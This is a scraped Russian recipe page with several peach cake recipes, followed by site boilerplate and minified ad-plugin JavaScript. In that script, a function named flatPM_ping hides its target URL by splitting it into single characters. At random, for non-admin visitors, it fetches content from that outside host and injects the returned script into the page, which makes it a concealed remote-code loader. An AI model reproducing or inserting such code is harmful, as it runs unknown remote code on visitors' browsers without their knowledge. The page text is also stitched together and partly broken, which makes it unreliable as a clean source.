Торт с персиками

Нежный торт с персиками

Ингредиенты

  • персик – 2-3 шт.
  • какао порошок – 1 ст.л.
  • = бисквит: =
  • яйца – 5 шт.
  • сахар – 320 г
  • сахар ванильный – 8 г
  • масло подсолнечное – 100 мл.
  • мука – 250 г
  • разрыхлитель для теста – 1 ч.л.
  • = крем: =
  • молоко – 500 мл.
  • крахмал – 50 г
  • мука – 35 г
  • творог – 300 г
  • сахарная пудра – 250 г
  • масло сливочное – 250 г
  • сахар ванильный – 8 г

Пошаговый рецепт приготовления

В чашу миксера разбиваем 5 яиц. Яйца взбиваем до легкой пены и постепенно высыпаем 320 г сахара. Сюда же высыпаем 8 г ванильного сахара. Все взбиваем до плотной пены, примерно 5-7 минут.

Во взбитые яйца тонкой струйкой вводим 100 мл рафинированного подсолнечного масла, не прекращая взбивания.

Отдельно смешиваем 250 г муки и 1 ч.л. разрыхлителя. Муку с разрыхлителем просеиваем и аккуратно смешиваем со взбитыми белками с помощью лопатки в 3 подхода.

Така как в одну форму для выпечки все тесто не поместится, выливаем 2/3 части теста в первую форму, и остальное – во вторую. Диаметр моих форм для выпечки 21 см. Если у вас одна форма для выпечки или в духовку не получается поставить сразу две формы, тогда замешивайте половину нормы теста и выпекайте коржи отдельно 2 раза, так как это тесто не может долго стоять.

Подготовленные формы ставим в разогретую духовку до 190 градусов. Выпекаем 35-40 минут, до сухой палочки.

Бисквиты уже остыли, достаем их из формы и разрезаем. Я это делаю струной для разрезания бисквита, ссылку, где можно купить такую струну, я оставлю под видео в описании. Также вы можете разрезать ножом или ниткой. Должно получиться 3 примерно одинаковых коржа.

Приготовим заварной крем. Всего понадобится пол литра молока. Половину молока выливаем в сотейник и ставим на огонь.

В оставшееся молоко насыпаем 50 г. крахмала и 35 г. муки. Все хорошо перемешиваем венчиком, чтобы не было комочков.

Молоко начинает закипать, выливаем в него оставшееся молоко с мукой и крахмалом.

Варим на небольшом огне постоянно перемешивая, чтобы не пригорело. Смесь должна загустеть и дойти практически до кипения. Если смесь не догреть, то может остаться привкус сырой муки.

В отдельную миску насыпаем 300 г творога любой жирности. Всего понадобится 250 г сахарной пудры, примерно 100 г высыпаем в творог.

Творог с сахарной пудрой измельчаем погружным блендером или в измельчителе до получения однородной массы.

В отдельную миску выкладываем 250 г сливочного масла комнатной температуры и добавляем оставшиеся 150 г сахарной пудры. Сюда же добавляем 8 г ванильного сахара. Все взбиваем примерно 5 минут, пока не побелеет масло.

Ко взбитому маслу добавляем по одной столовой ложке заварного крема, каждый раз взбивая миксером.

Затем сюда же по столовой ложке добавляем измельченный творог, точно также, каждый раз хорошо взбивая миксером.

Два свежих персика чистим от кожуры и нарезаем небольшими кубиками.

Собираем торт в кондитерском кольце. На дно кладем первый корж. Для удобства по бокам вставляем ацетатную пленку и сжимаем кольцо до размера коржа.

На корж кладем примерно 3 ст. л. крема и равномерно распределяем его по коржу.

Сверху на крем кладем половину нарезанных персиков.

На персики кладем крем и разравниваем его.

Кладем следующий корж, крем, персики, крем и накрываем последним коржом.

В итоге должна остаться примерно четвертая часть крема, которая понадобится для украшения.

Оставшийся крем и собранный торт накрываем пищевой пленкой. Все ставим в холодильник примерно на 6 часов.

Прошло 6 часов. Предварительно достаем крем, чтобы он успел нагреться до комнатной температуры. Затем достаем торт, вынимаем его из кондитерского кольца, переставляем на подставку и снимаем ацетатную пленку.

Сначала торт обмазываем небольшим количеством крема, чтобы прибить бисквитные крошки.

Сразу же, поверх грунтовочного слоя на бока торта накладываем основой слой крема.

Бока торта выравниваем кондитерским шпателем. На верх торта кладем оставшийся крем и тоже его выравниваем.

Торт ставим примерно на 1 час в холодильник, для того чтобы застыл крем.

Крем уже застыл. Украшать торт будем с помощью трафарета из набора, ссылку на такой набор трафаретов я так же оставлю в описании под видео.

Трафарет кладем на застывший крем. Сверху торт равномерно посыпаем какао с помощью маленького ситечка. Аккуратно снимаем трафарет.

Торт получился очень нежным и вкусным. Крем в этом торте очень похож по вкусу на мороженое пломбир, и он замечательно сочетается с ароматными персиками и нежным бисквитом. А такое украшение по силам даже начинающим кулинарам.

Видео рецепт

Бисквитный торт с персиками “Проще простого”

Рецепт торта придумала сама, в нем нет ничего сложного, а вкус с трудом можно отличить от покупного. Одним словом- пальчики оближешь!

Ингредиенты для «Бисквитный торт с персиками “Проще простого”»:

Тесто

Крем

  • Сметана (Сметану лучше брать самой высокой жирности, но если такой нет, ее можно загустить ) — 300 г
  • Крахмал картофельный (Крахмал нужен для того, чтобы загустить сметану. Если сметана жирная, крахмал не требуется) — 1 ч. л.
  • Сахар — 5 ст. л.

Для украшения

  • Персик (Персики лучше брать консервированные) — 1 бан.
  • Желатин — 1 ч. л.

Время приготовления: 120 минут

Количество порций: 12

Рецепт «Бисквитный торт с персиками “Проще простого”»:

Подготовим основные ингредиенты для нашего бисквита

В емкость разбиваем яйца и немного взбиваем

Самый важный момент- для того, чтобы бисквит получился пышным, нужно тщательно взбивать яйца с сахаром до образования густой пены (миксером взбивать примерно 10 минут)

Добавляем разрыхлитель и муку, НО не взбиваем, а аккуратно перемешиваем ложкой

Наше тесто готово

Осторожно переливаем тесто в форму и ставим в духовку при температуре 180 градусов на 40 минут (духовку первые 30 минут не открываем, чтобы бисквит не осел)

Пока бисквит в духовке займемся кремом. Взбиваем сметану с сахаром, пока объем не увеличится хотя бы в два раза. Если сметана малой жирности, добавляем крахмал и снова взбиваем. Отправляем крем в холодильник на 30-40 минут

Готовый бисквит достаем из духовки и даем ему полностью остыть, в это время в небольшой емкости подогреваем немного сиропа из банки консервированных персиков с чайной ложкой желатина. Ждем пока желатин растворится, выключаем, ставим остывать

Далее нарезаем персики. Одну часть мелко, для того, чтобы добавить в крем. Другую часть нарезаем тонкими лепестками для украшения сверху

Бисквит остыл- разрезаем его на две, а лучше на три части (я разрезала на две)

Достаем наш загустевший крем из холодильника, начинаем собирать торт

Нижний корж пропитываем небольшим количеством сиропа от персиков. Можно сделать любую пропитку на свое усмотрение (с капелькой коньяка, ароматными эссенциями, вареньем), сверху выкладываем крем и равномерно распределяем

Выкладываем мелко нарезанные персики

Накрываем другим коржом, снова смазываем кремом

Самый интересный момент- начинаем украшать! Украшайте как подсказывает Ваша фантазия. Я решила сделать украшение в виде цветка. Начинайте выкладывать лепестки по самому краю торта

Продолжайте украшать, немного накладывая последующий слой на предыдущий, для визуального объема

Наше украшение готово

Для того, чтобы все хорошо держалось, заливаем персики желатиновой смесью и отправляем в холодильник застывать, можно подождать пару часов, но лучше, чтобы торт пропитался за ночь. По желанию можно смазать бока сметанным кремом.

Наконец, торт готов! Разрезаем, подаем к столу. Ну ооочень вкусно! Приятного аппетита!

Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

Поделиться рецептом с друзьями:

Нравятся наши рецепты?
BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

Похожие рецепты

Торт “Ягодный Лентяй”

  • 2
  • 138
  • 1668

Торт “Love is. ”

  • 110
  • 105
  • 6234

Торт “Метеорит – 3 ”

  • 224
  • 863
  • 75160

Бисквит “Палочка-выручалочка”

  • 126
  • 537
  • 5493

Торт “Мой зайчик”

  • 29
  • 14
  • 4690

Кофейный торт с грецкими орехами

  • 25
  • 32
  • 6584

Торт “Жемчужина”

  • 52
  • 54
  • 5063

Торт “Фрезье”

  • 21
  • 263
  • 10740

Торт апельсиново-трюфельный «Школьный бант»

  • 53
  • 120
  • 15291

Фотографии «Бисквитный торт с персиками “Проще простого”» от приготовивших (1)

Комментарии и отзывы

15 августа 2016 года lelikloves #

14 августа 2016 года anika_59 #

14 августа 2016 года aleksandra ukhanva # (автор рецепта)

17 августа 2016 года Зиля Гумерова #

17 августа 2016 года aleksandra ukhanva # (автор рецепта)

14 августа 2016 года xmxm #

14 августа 2016 года Navely #

Оставить комментарий или отзыв о рецепте

Зарегистрироваться, или войти если вы уже регистрировались.

Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

Бисквитный торт с персиками

Друзья, вчера приготовил бисквитный торт с персиками. Хотя, в принципе, вместо персиков можно было использовать другие фрукты и ягоды. Но у меня в холодильнике нашлись только консервированные персики и апельсиновый сок.

Такой тортик делал первый раз, и временами даже казалась, что ничего не выйдет, но, к счастью, обошлось. Торт получился отличный, мне понравился, буду готовить ещё!

Впечатлило то, что для приготовления этого тортика требуется совсем немного муки и сахара. Но, несмотря на это, он очень приятен на вкус. Торт трёхслойный. Нижний слой — это бисквит, средний — заварной крем, а верхний — сок и фрукты.

  • На выходе у меня получился торт весом 1200 грамм. Затраты в денежном эквиваленте на продукты — 198 рублей.

    Ингредиенты для тортика

    Нам понадобятся вот такие составляющие.

    Бисквит (нижний слой)

    • Мука — 75 гр.
    • Сахар — 90 гр.
    • Яйцо — 2 шт.

    Крем (средний слой)

    • Желток куриного яйца — 3 шт.
    • Сахар — 60 гр.
    • Крахмал кукурузный или картофельный — 20 гр.
    • Сливки нежирные — 250 мл.
    • Сливки жирные — 200 мл.
    • Сливочное масло — 50 гр.
    • Желатин — 10 гр.

    Верхний слой и пропитка бисквита

    • Банка персиков в сиропе — 1 шт.
    • Апельсиновый сок — 200 мл.
    • Желатин — 7 гр.

    Как приготовить

    Разберёмся с желатином

    1. Желатин для крема (10 гр.) замочить в 50 гр. сливок, а 7 гр. желатина для верха замочить в 50 гр. апельсинового сока.
    2. Персики порезать на плоские ломтики.

    Сделаем бисквит

    1. Взбить миксером яйца и сахар. Я взбиваю до тех пор, пока масса не побелеет, после чего добавляю муку и снова хорошо перемешиваю полученное тесто.
    2. Тесто залить в форму и поместить в заранее разогретую до 180 градусов духовку. Выпекать корж в течение 25 минут.
    3. Полученный корж достать из формы, а когда он остынет, срезать верхнюю корочку.

    Приготовим крем

    1. Взбить яичные желтки и сахар до образования белой массы.
    2. Добавить крахмал и снова взбить.
    3. Разогреть до кипения 200 мл. сливок и добавить к ним взбитые желтки, сахар и крахмал.
    4. Полученную массу варить, постоянно помешивая, на среднем огне, пока не загустеет.
    5. Добавить сливочное масло и всё хорошо перемешать.
    6. Разогреть желатин, замоченный ранее в сливках до его полного растворения, убрать с плиты и минут через 5 смешать с кремом, хорошо взбить массу.
    7. Взбить 200 мл. жирных сливок миксером и смешать с кремом.

    Соединим части пирога

    1. На дно формы поместим корж и пропитаем его поверхность сиропом от персиков. Высоту формочки можно увеличить при помощи пищевой фольги, распределив её по краям формы.
    2. Сверху коржа залить крем.
    3. В 150 мл. сока добавить 100 мл. персикового сиропа, сюда же добавить желатин, растворённый ранее в соке. Разогреть всё до полного растворения желатина (не кипятить).
    4. Сверху крема выложить дольки персиков ровным слоем.
    5. Залить соком, смешанным с сиропом и желатином и убрать в холод примерно на 3 часа.
    6. Достать из холодильника, снять форму и съесть!
    • Опубликовал: Chef
    • После приготовления вы получите: 8 порций
    • Время приготовления: 45 минут

    Муссовый торт с персиками

    Для рецепта вам потребуется:

    • сахар – 90г
    • сливочное масло – 100г
    • яйцо – 2 шт.
    • щепотка соль
    • миндальная мука – 100г
    • пшеничная мука – 70г
    • молоко – 120 мл
    • разрыхлитель – 5г разрыхлитель – придает готовому тесту пористую структуру и объем. Состоит из смеси разных химических веществ – щело. ” href=”/dictionary/208/razryhlitely.shtml”>
    • сироп (с персиков) – 100 мл
    • персики (без кожицы и косточек, консервированные) – 600г
    • сахар – по вкусу
    • персиковый сироп – 50 мл
    • желатин – 15г
    • вода – 20 мл
    • сахар (1часть) – 80г
    • яйцо (желток) – 3 шт.
    • сахар (ванильный)
    • желатин – 20г
    • сироп (с персиков) – 100 мл
    • сливки (жирность 33%) – 450 мл
    • сахар (2 часть) – 100г
    • вода – 20 мл
    • желатин – 5г
    • сливки – 50 мл
    • пищевой краситель
    • молоко – 50 мл
    • шоколад белый – 60г

    Рецепт приготовления:

    Чтобы приготовить Муссовый торт с персиками необходимо.

    Для бисквита сливочное масло комнатной температуры взбить с сахаром. Отделить белки от желтков. Соединить желтки, миндальную и просеянную пшеничную муку, смешанную с разрыхлителем. Влить молоко, перемешать и добавить эту смесь масляной смеси.

    Отдельно взбить белки в крепкую пену и аккуратно примешать в тесто.

    Дно формы для торта диаметром 20 см выстелить пергаментом и выложить в неё тесто. Можно выпекать одним коржом, а затем разрезать на два, или разделить тесто и выпекать два коржа. Бисквит печь в предварительно прогретой до 180С духовке 20-25 минут.

    Готовый бисквит остудить, извлечь из формы и разрезать на два коржа.

    Для персикового конфитюра слить сироп с консервированных персиков. В 50 мл сиропа замочить желатин. Персики измельчить блендером, добавить сахар по вкусу поставить на огонь, довести до кипения и варить 1-2 минуты. Снять с огня, добавить желатин и перемешать до полного растворения желатина. Остудить и дождаться пока персиковый конфитюр начнет густеть.

    Для мусса соединить 20 мл воды и 80 г сахара и довести до кипения, после чего уменьшить огонь и варить сахарный сироп до пробы на тонкую нить, т.е. если пальцами сжимать и разжимать каплю сиропа, образуется тонкая, быстро рвущаяся нить. Снять готовый сироп с огня.

    Желтки взбить. Продолжая взбивать добавить тонкой струйкой, постепенно горячий сахарный сироп. Продолжать взбивать, пока масса не побелеет и не увеличится в объёме в два раза.

    Желатин замочить в персиковом сиропе, нагреть на слабом огне, не доводя до кипения, перемешать до полного растворения желатина. Добавить к желткам растворившийся желатин и остудить.

    Взбить 450 мл сливок со 100г сахара. Аккуратно добавить взбитые сливки к желтковому крему, добавить ванильный сахар и перемешивать до образования однородной массы. Поставить в холодильник на 15-20 минут.

    Для сборки торта на дно разъёмной формы поместить один бисквитный корж, пропитать персиковым сиропом. На него выложить загустевающие персики и убрать в холодильник на 1 час.

    Застывший персиковый конфитюр накрыть вторым бисквитным коржом. Корж пропитать сиропом и вылить на него мусс. Убрать в холодильник до полного застывания.

    Для глазури замочить желатин в воде. Сливки и молоко вскипятить. Добавить набухший желатин и размешать до полного его растворения. Добавить поломанный на кусочки белый шоколад, краситель и размешать до однородности.

    Достать торт из формы. Верх и бока торта покрыть ровным слоем глазури и убрать в холодильник на 30 минут или больше, пока глазурь полностью не застынет. Украсить муссовый торт с персиками по своему желанию.

    средний бал: 0.00
    голосов: 0

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};